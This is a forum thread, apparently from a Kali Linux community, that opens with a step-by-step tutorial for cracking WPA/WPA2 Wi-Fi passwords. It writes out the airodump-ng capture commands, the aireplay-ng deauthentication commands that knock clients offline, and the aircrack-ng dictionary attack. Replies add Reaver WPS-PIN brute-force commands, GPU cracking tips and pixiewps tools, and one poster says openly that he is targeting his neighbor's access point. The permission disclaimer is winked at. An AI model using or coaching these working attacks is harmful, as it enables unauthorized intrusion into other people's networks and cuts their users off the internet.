Cracking a WPA/WPA2 wireless Access Point

[MrShingles]

Before going into the commands of what you need to type you need to understand the basics of what you need to do. Here is what you need to do in order (roughly):

Create a monitoring device on your computer. Presuming you have a wireless adapter on your computer you should be able to create a monitoring device. Not all devices can inject packets however which is very important.
Search for wireless access points to crack into. Although you might be able to see an AP you might not necessarily be able to sit between the router and a user, but running the following commands will determine that.
Hone in on the specific AP. You need to get some specific information about the access point and who is connected to it. You need to do this to enable you to know who to listen in on. You’re looking for the requests sent from the user to the router.
Start logging the requests hashes. Specifically the password hashes!
Start a brute force attack. You need a password list file(s) to do this. Get one!

Don’t worry if you don’t understand all of the above, all will become apparent soon.

Type:
ifconfig

Providing you get a result that says you have a wlan0,1,2 etc you should be ok! If you have one that says mon0,1,2 etc that skip the next step.

Type:
airmon-ng start wlan0

This will create a monitoring device. Take note of what it’s called. Should be something like mon0, mon1 etc.

Type:
airodump-ng -c 6 mon0

This will start a scan of everything you can see around you. Note that it’s using mon0 as the monitoring device and it’s on channel 6. Change these options as you see fit.

Now this is the time to do some watching. You’re looking for a wireless connection that is WPA/WPA2 enabled. Note which channel it’s on and take a note of the MAC address.

Type:
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w psk mon0

Use the string above to start listening in on to a specific AP. Again change the channel the MAC address and monitoring device as you see fit.

Now, this bit gets a bit complicated and cool at the same time. What you may (or may not) need to do is force users to send login requests to the router. You can do this by entering the AP MAC address and another users MAC address into the following string.
HINT: You can obtain a users MAC address from the window we last used.

Type:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Now, see the number 1 near the start? That isn’t enough i don’t believe force a users computer to send a login request to the router. However, i’ve been told it is. The truth is, if you change the ’1′ to ’9999999′ or some other ridiculous number then it’s sure to work. However, you will completely block that users connection to the internet… So, yeah. Do what you will with that command, and don’t hold me responsible!!

Anyway, by now you should have sufficient hashes for you to crack.

Type:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

This will start a brute force password file attack and eventually produce a password you can use to connect to the router.

I have not gone into great detail about what each little bit does and there is so much more you can do. This tutorial is just to get you started. If you want to know even more then go here to the lovely people who made this great product and check out their tutorials.

Have fun! Oh, and only crack into wireless devices you manage or get permission from the owner! cough cough

[br0k3ngl@55]

Hi MrShingles,
i am wondring - what could be reason for not catching 4 way handshake when doing deauthentication with -0 reason. i checked the .cap file that i saved and it has eapol in the inside of it but, for some unknown reason airodump-ng wasn't able to see them. do you have any guess i how could i fix this ?

[Zwillingsbruder]

Failed attempt on my home wireless network on WPA with 1 handshake and using darkc0de.lst from teamctfu. It's a simple 14 letter two merged word passphrase. After 1,144,730 keys tested, it posts passphrase not in dictionary. Is there a better or longer dictionary out there or do I need to collect more handshakes?

[mmusket33]

We suggest you turn to aircrack-ng forums for questions concerning cracking WPA thru brute force methods.

[thepoor]

disregard.....

[thepoor]

Sorry but this does not work for me. I set up my router with key as 12345678 have my other laptop connected and got a handshake. aircrack-ng with darkc0de.lst but it did not found the key. I also cracked it with WPAword list and nada.

[thepoor]

Well, I crunched my own 8 digits numeric wordlist and it found my key. I guess you have to tried a different wordlists and patient to get it. just like fishing.

[Hitman]

Try Reaver which makes things easy don't depend on word-lists its a long process with minimum success rates.

[thepoor]

I tried and I got the following:

reaver -i mon0 -c 10 -b 00:00:00:00:00:00 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 360

[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request

[Name Taken]

Cracking at 500-1k passwords per CPU thread per second in a laptop with Aircrack-ng is not very efficient. If you have a Scrypt mining rig with 6 R9 290 for example, that can crack at 900k passwords/second with oclHashcat. I have complied my own wordlist from dozens of smaller ones then stripped them using

Code:

"grep -E '^[0-9a-zA-Z]{8,}$' dict_unique.txt > wordlist.stripped.txt"

[mmusket33]

To Name Taken

Is there any chance that you provide more details and expand on the following :

Scrypt mining rig with 6 R9 290

We are always interested in higher speeds

MTA

[Name Taken]

To Name Taken

Is there any chance that you provide more details and expand on the following :

Scrypt mining rig with 6 R9 290

We are always interested in higher speeds

MTA

What specifically do you want to know? Scrypt is an alternative algorithm to SHA-256 many cryptocurrencies use. Mining cryptocurrencies is very similar to password cracking. GPUs are significantly faster than CPU.

[YeahBitcoin]

As Name taken states, he was referring to mining rigs. 6 R9 290's are about as powerful a rig as you can get nowadays. I also mine on reasonably powerful rigs and with some help would put my Hash power towards password cracking for people here. I'm a new user to Kali and currently learning lots as I go but keep to get involved.

I have an HD7990 and 5970 that I could put towards cracking.

[henrique_luiz]

Hello everybody!

I would like to capture encrypted frames, but I can't. Help me, please.
Used the commands:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

airodump-ng --bssid 9c:d6:43:a8:9d:60 wlan0 -c 4 -w test2015 wlan0

Just capture a control frames: Clear-to-send, ack; and beacon frames.

I would like capture a bit stream encrypted 1001110110101001 by data frames.... How can I do it?

Thank you very much.

[squashen]

Hello everybody!

I would like to capture encrypted frames, but I can't. Help me, please.
Used the commands:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

airodump-ng --bssid 9c:d6:43:a8:9d:60 wlan0 -c 4 -w test2015 wlan0

Just capture a control frames: Clear-to-send, ack; and beacon frames.

I would like capture a bit stream encrypted 1001110110101001 by data frames.... How can I do it?

Thank you very much.

First off all as he told you in the tutorial you shoud use the monitor device (mon0)and not wlan0 in your "airodump-ng --bssid 9c:d6:43:a8:9d:60 wlan0 -c 4 -w test2015 wlan0" line
Second i dont know why you set wlan0 2 times in same line.

And for the third when you start to put your wlan0 into monitor mode you dont need 2 down it, just use following line

airmon-ng start wlan0 (device is putting into monitormode)

now you sometimes can se some info about process who may disturb your monitordevice, in my case its look like this

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
2589 NetworkManager
2708 wpa_supplicant
2736 dhclient
3121 dhclient
Process with PID 2736 (dhclient) is running on interface wlan0

If you se this warning just use the kill command like this.

kill 2589

and so on until all process are killed. (sometimes it says a process dont exist becouse when you kill 1 process another chainreact to that and close auto)

Now your ready to move on to the airodump-ng line again and this time use mon0 and just 1 time.

[henrique_luiz]

Firstly, thank you squashen.
I used the command: "airmon-ng start wlan0" and killed the process. So run the command: "airodump-ng --bssid 9c:d6:43:a8:9d:60 -c 4 -w 05022015 mon0"
Unfortunately the problem persists: I can capture only control frames and beacon frames.
Thereafter, I tried use the kismet but occurred the same result: capture only control frame, QoS frame and beacon frame.
I would like capture encrypted data frames. Is it possible?

[Randall]

Hey,

after doing a lot of reading on this topic and messing with Kali quite a bit I've decided to ask the more experienced guys..
I am running Kali 1.0.9a 64 bit from USB.

My goal is to crack a wifi password obiously. I tried the built in tool (with gui .. can't remember the exact name as I have no reference).
With attacks on WPS (reaver) I always get the 'failed to associate with... ' error.
When I was trying airodump, I even failed to get a handshake. I also tried wifite, which is quite intuitive.. but also didn't have any success.

Is there something I am doing wrong? I can repeat the process and take screenshots of all outputs... without the handshake, I cannot progress in any way.

Also there are few technical things that I was unable to look up.
1. I understand that when the wifi adapter is in monitor (promiscuous) mode, it's able to listen to all the passing traffic. But how is it possible that Kali can interact (send commands) with the AP? It is not connected in any way.
2. When sending deauth packets, what exactly happens to the clients? Do they get disconnected completely? Wouldn't that make (the slightly more educated ones) suspicious of what's going on? What if the AP that I am attacking doesn't have clients connected?
3. OP mentions that the client's MAC address can be obtained from airodump-ng output.. which one is it? There's a BSSID and a station address displayed.
4. I completely don't get the way wordlist work. I mean, what is the probability that the AP would have a password from a randomly generated wordlist?
Is it not better to use, let's say crunch to generate all combinations of lower, upper case letters and numbers?

Thanks a lot for help
And sorry for the lengthy post, I wanted to compile it into one post.. this is driving me crazy for the past couple of days and I really want to make some progress.
I am happy to provide any further details if needed.

[henrique_luiz]

I read this pdf <www.kismetwireless.net/bsides/wifi_tools.pdf>, page 2: "If you’re on a WPA protected network, you will only see packets destined to your device, and
broadcasts." Ok. I know this because GTK is the same for all stations. But, for capture broadcast frames I need have the password and be concected with access point. I don't conect the AP, but I want colect the encrypted frames, the set of bits: ...10110100101110011010111001... Is it possible?

[squashen]

Hey,

after doing a lot of reading on this topic and messing with Kali quite a bit I've decided to ask the more experienced guys..
I am running Kali 1.0.9a 64 bit from USB.

My goal is to crack a wifi password obiously. I tried the built in tool (with gui .. can't remember the exact name as I have no reference).
With attacks on WPS (reaver) I always get the 'failed to associate with... ' error.
When I was trying airodump, I even failed to get a handshake. I also tried wifite, which is quite intuitive.. but also didn't have any success.

Is there something I am doing wrong? I can repeat the process and take screenshots of all outputs... without the handshake, I cannot progress in any way.

Also there are few technical things that I was unable to look up.
1. I understand that when the wifi adapter is in monitor (promiscuous) mode, it's able to listen to all the passing traffic. But how is it possible that Kali can interact (send commands) with the AP? It is not connected in any way.
2. When sending deauth packets, what exactly happens to the clients? Do they get disconnected completely? Wouldn't that make (the slightly more educated ones) suspicious of what's going on? What if the AP that I am attacking doesn't have clients connected?
3. OP mentions that the client's MAC address can be obtained from airodump-ng output.. which one is it? There's a BSSID and a station address displayed.
4. I completely don't get the way wordlist work. I mean, what is the probability that the AP would have a password from a randomly generated wordlist?
Is it not better to use, let's say crunch to generate all combinations of lower, upper case letters and numbers?

Thanks a lot for help
And sorry for the lengthy post, I wanted to compile it into one post.. this is driving me crazy for the past couple of days and I really want to make some progress.
I am happy to provide any further details if needed.

Answer on your first question can be some of the following

1. you are to far away from AP (even if you have a signal its sometimes not enough for a good communication, You may hear the routers signal, but dont forget that router needs to hear you 2)
2 you are 2 close 2 router (its like reading a paper, you cant se the letters from a mile, but you cant even se the letter if you press the papers against your eyes.
3. you wirelesscard doesent support this kind of stuff.
4. sometimes reaven can have problem with the association, try use the -A options to not use assocciation in reaver, but if you do you must use another associationprogram like aireplay-ng with -1 option.

your other question.

1. when you are accosiated with a router you have a kind of conection with the router and can talk to it but you are not letted in on the network yet (its like knocking on someones door and he open, you can talk to the person in the house, but he hasent yet let you in the house.)
2. the deauth packet force the client of the network, if the client has a autoconnect option enable hes online again in a few sec if you only send 1 or few packet, if you send like 50 packets hes offline while the packets sends and try to reconect and gona do so when those 50 packets stop coming.
What i have got is that the deauth-packet is a warning send to the Ap that this client is not a valid client (not trusted, have sneaked in) and the Ap diretly kicks the client out for doing a pass-control again before he lets in (and its that we wanted to happen if we want a handshake)
and to do so we sont need to be inside the house to send the warning, its enough to knock on the door and tell him when he open the door (being associated)
But the people do often when they dont get a handshake is that they send to few pakets to the ap with deauth, send about 30-40 so its relly goes offline, and the clients need to have the autoconnect enabled.

3. bssid is the Ap:s mac and the station is a client and its mac
in your pic you se 2 ap:s in the top, below you se a connection between 1 of the ap:s and a client.(if you do an association to that ap your mac gona show up there 2)
and the other Ap have no clients cconnected what you have found anyway.
4. The wordlist was more better before when the mostly routers have password setted from the owner, and that was often a knowed word wich was easy to remeber. and if you just try wellknowed word the brute time went down drastic.

hope that clear some of your question and sorry for my extremt badly englishXD

[Randall]

oh perfect. Thanks a lot! Definitely cleared some things up.

I guess I will repeat the whole process and take screenshots so you know what's going on. I think the distance should be alright... it's my neighbor's AP in a flat. I usually get 3-4/5 signal strength.
Is there a test to see if my wifi card is capable of this? I tried an injection test some time, but don't remember the output.

[squashen]

Yeah aireplayng -9 is one test (the injecttest)
Otherwise the thing you an do is check what other people say about your card in different forum, sometimes differnt card work different good with different drivers and different program with different libs.

[Randall]

so just another update..
I used wifite this time. I managed to finally get a handshake at least (still took quite a long time). Not sure why a WPS attack failed, when the wps on the AP was enabled.
One thing I am curious about is the size of crunch generated wordlists.. do I require to have such a massive free space on my disk? With a combination of lower and uppercase letters and numbers, it would be 100s of TB.
I am now trying to use pyrit to do this with my GPU... with my nb's i5 cpu it would take ages.

[henrique_luiz]

Hello, everybody!

I learned with Nayanajith that QoS frames are encrypted data frames. Using wireshark and the password, it is possible to decrypt frames collected with airodump.
<http://mrncciew.com/2014/08/16/decrypt-wpa2-psk-using-wireshark>

Thanks a lot!

[frafri]

reaver -i mon0 -c 1 -b <mac> -S -N -a -vv -d 30 -r 3:15 -L -A
this worked for me on a Linksys E1000 , found the WPS pin which was '92489448'
We need to look into wps-pin its doing , creating a database of wps-pin numbers.

[Invictus]

I get neither wlan0 or mon0 when typing ifconfig. I have eth0 and lo

Trying to start eth0 gives me :

Code:

root@kali01:~# airmon-ng start eth0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
2126	dhclient
2419	NetworkManager

Now keep in mind that I am completely new to this, but after some research I believe I have to buy an usb wireless adapter that supports packet injection?
Could anyone confirm that or help me out in another way

[FurqanHanif]

I get neither wlan0 or mon0 when typing ifconfig. I have eth0 and lo

Trying to start eth0 gives me :

Code:

root@kali01:~# airmon-ng start eth0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
2126	dhclient
2419	NetworkManager

Now keep in mind that I am completely new to this, but after some research I believe I have to buy an usb wireless adapter that supports packet injection?
Could anyone confirm that or help me out in another way

i think you are using Virtual Machine (if yes then ofcourse you need to buy an Usb Wifi Card). And if no then Simply Boot Kali from USB and Then Check , i 'm Sure it'll Work Fine...

[machx]

Hi,

I would like to share something, Which I have tested and proved 100% results:

Please use wifite-mod-pixiewps, it cracks the PIN and reveals the WPA Passphrase in less than 2 minutes.
Here is the link to https://github.com/aanarchyy/wifite-mod-pixiewps . All the credits goes to aanarchyy and the team.

How to install wwifite-mod-pixiewps
1. unzip the package
2. copy the wifite-ng program to desktop
3. Right-click on wifite-ng
4. properties
5. Permissions - check allow executing as a program
6. close
7. run and select open in terminal

Please note:
Make sure you have installed:
1. reaver-wps-fork-t6x by t6x (https://github.com/t6x/reaver-wps-fork-t6x)
2. Pixiewps by Wiire (https://github.com/wiire/pixiewps)

You can also instal latest reaver and aircrack-ngl via terminal
1. apt-get update
2. apt-get install reaver aircrack-ng
This is will install the latest aircrack version( no longer mon0 instead wlan0mon) and will also install reaver 1.5.2

Here is the link for reference https://www.kali.org/penetration-tes...ck-ng-updates/

Always target a router whose db signal is between 40db - 50db pr more, not less than 20db(check in wifite when you run)

Happy Hacking.

Cheers!